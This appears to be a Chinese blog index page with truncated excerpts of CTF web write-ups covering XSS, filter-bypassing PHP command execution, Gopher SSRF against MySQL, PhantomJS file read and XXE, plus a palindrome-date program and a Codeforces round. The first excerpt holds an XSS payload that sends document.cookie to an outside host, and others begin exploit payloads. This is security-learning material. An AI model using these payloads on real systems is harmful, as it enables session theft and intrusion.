-
ctf_show-web入门-XSS(316-333) 未完
web316 <script>var img = document.createElement("img");//创建img标签 img.src = "http://ip?cookie="+document.cookie;//设置img标签的src </script>或者<script>locati -
CTFSHOW-日刷-红包题第九弹-shellme_Revenge-自增绕过
根据cookie里面的提示,get传入looklook参数 代码就是无符号命令执行,注意数字1到3和大写字母C没过滤 ~和|和^都过滤掉了,注意$没过滤,加减也没过滤可以尝试自增构造 payload ctf_show=$_=C;$_++;$C=++$_;$_++;$C_=++$_;$_++;$_++ -
CTFSHOW-日刷-红包题第九弹-SSRF-Gopher攻击mysql
一个登入页面,登入没反应,抓包看一下 发现有一个url跳转,尝试ssrf读取文件 没成功 这里用Gopher 协议 攻击mysql写入 Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以 -
ctf_show-web入门-命令执行(118-124)
web-118 测试了一下发现数字和字母过滤了,第一反应是无符号rce,发现走不通。 后面发现大写字母没过滤,这里可以参考月饼杯web3的方法 https://www.cnblogs.com/aninock/p/15360157.html 我们想办法输出 flag.php即可,输出语句可以用nl 可 -
算一下从公元纪年开始到现在,总共有多少个回文日
问题 今天是2021.12.02,这串数字无论正读还是反读都是一样的,这种日期形式称为“回文日”。 朋友圈流行着这样一张图片 “千年难遇”?我不信,所以我打算写个代码跑一跑。 所考虑情况为月和日均为两位数,如2001.1.5记作2001.01.05,年份则不含前缀0. 代码 #include<bit -
BUUFTC-日刷-[FireshellCTF2020]ScreenShooter-PhantomJS文件读取漏洞
一个输入框,输入后会返回一个图片是截图 但是大概率是爬虫爬取前端代码 在vps监听一下80端口 观察请求发现用的是PhantomJS 而查询可知,PhantomJS 2.1.1是有任意文件读取漏洞的,CVE-2019-17221 payload <!DOCTYPE html> <html> <hea -
BUUFTC-日刷-[NCTF2019]Fake XML cookbook-xxe入门
登入抓包 可以发现数据是以xml格式传入的,登入失败会返回账号,同样是xml格式 而xml格式可以引用外部实体(可以是本地文件) 尝试传入 <?xml version = "1.0" encoding = "utf-8"?><!DOCTYPE user [ <!ENTITY file SYSTEM -
BUUFTC-日刷-[安洵杯 2019]easy_serialize_php-反序列化逃逸
<?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).' -
Codeforces Round #756 (Div. 3)
题目如下: A. Make Even time limit per test 1 second memory limit per test 256 megabytes input standard input output standard output Polycarp has an intege -
BUUFTC-日刷-[GWCTF 2019]我有一个数据库-phpmyadmin
啥都没有,前后端抓包也找不到啥,估计是目录扫描,但是号称第一的dirmap-master也没扫出啥 后来看博客,大佬们说看题目名字就猜到考啥,访问phpmyadmin路径(记下 phpMyAdmin是一个非常受欢迎的基于web的MySQL数据库管理工具 存在漏洞cve-2018-12613-PhpM